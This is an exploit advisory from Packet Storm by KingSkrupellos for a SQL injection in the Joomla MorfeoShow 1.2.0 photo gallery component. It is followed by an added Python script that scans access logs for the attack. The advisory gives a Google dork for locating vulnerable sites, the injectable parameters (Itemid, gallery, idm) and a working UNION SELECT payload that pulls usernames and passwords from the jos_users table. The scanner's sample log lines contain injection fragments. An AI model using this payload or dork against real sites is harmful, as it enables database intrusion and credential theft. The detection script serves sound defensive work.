packetstorm | KingSkrupellos | PACKETSTORM:151432
History: Jan 31, 2019 - 12:00 a.m.

Joomla MorfeoShow 1.2.0 SQL Injection

`####################################################################  
  
# Exploit Title : Joomla MorfeoShow Components 1.2.0 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 31/01/2019  
# Vendor Homepage : joomla4ever.org  
# Software Download Link : joomla4ever.org/archive/ext/com_morfeoshow.zip  
# Software Information Link : joomla4ever.org/extensions/ext-morfeoshow  
# Software Version : 1.2.0  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/index.php?option=com_morfeoshow''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Description about Software :  
***************************  
MorfeoShow - Photo Gallery for Joomla 1.5 + plugin to insert photos in the site's content!  
  
####################################################################  
  
# Impact :  
***********  
  
* An attacker might be able to inject and/or alter existing SQL statements, which would influence the database exchange.  
  
* The SQL injection vulnerability exists in the Joomla MorfeoShow component 1.2.0 because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  
  
* The MorfeoShow component for Joomla! allows remote attackers to execute arbitrary SQL commands via the "Itemid=", "gallery=" and "idm=" parameters, used with different action parameters to index.php.  
  
* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the web server is misconfigured, read and write access to the filesystem may be possible.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/index.php?option=com_morfeoshow&Itemid=[SQL Injection]  
  
/index.php?option=com_morfeoshow&task=view&gallery=[SQL Injection]  
  
/index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[SQL Injection]  
  
/index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[ID-NUMBER]&Itemid=[ID-NUMBER]&idm=[SQL Injection]  
  
# SQL Injection Exploit Payload :  
*****************************  
  
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
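
A defender-side check for the requests this advisory describes, added here as an example (not part of the original advisory or the MorfeoShow code base): it scans web-server access log lines for `com_morfeoshow` requests whose `Itemid`, `gallery` or `idm` value is not a plain integer. The log lines are constructed samples, and the function names and the combined log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as injectable. Its URL patterns show them
# carrying ID numbers, so any non-integer value is worth reviewing.
ID_PARAMS = ("Itemid", "gallery", "idm")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d{1,10}")


def suspicious_params(url):
    """Return sorted names of com_morfeoshow ID parameters with non-integer values."""
    # parse_qs URL-decodes values and keeps repeated parameters as a list,
    # so a duplicated Itemid is checked once per occurrence.
    query = parse_qs(urlsplit(url).query)
    if "com_morfeoshow" not in query.get("option", []):
        return []
    return sorted(
        name for name in ID_PARAMS
        if any(not INTEGER_RE.fullmatch(v) for v in query.get(name, []))
    )


def scan(log_lines):
    """Yield (line_number, client_ip, bad_params) for each flagged request."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_params(match.group(1))
        if bad:
            yield number, line.split(" ", 1)[0], bad


# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_morfeoshow&task=view&gallery=3&Itemid=12 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [31/Jan/2019:10:00:07 +0000] "GET /index.php?option=com_morfeoshow&task=view&gallery=3&Itemid=12+and+1=0 HTTP/1.1" 200 4980',
    '203.0.113.5 - - [31/Jan/2019:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=abc HTTP/1.1" 200 7301',
    '198.51.100.23 - - [31/Jan/2019:10:00:12 +0000] "GET /index.php?option=com_morfeoshow&task=view&gallery=3&Itemid=12&Itemid=12&idm=7%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for number, client, params in scan(SAMPLE_LOG):
        print(f"line {number}: {client} non-integer {', '.join(params)}")
```

The same integer-only rule is what the component's own input handling should enforce before these values reach a query.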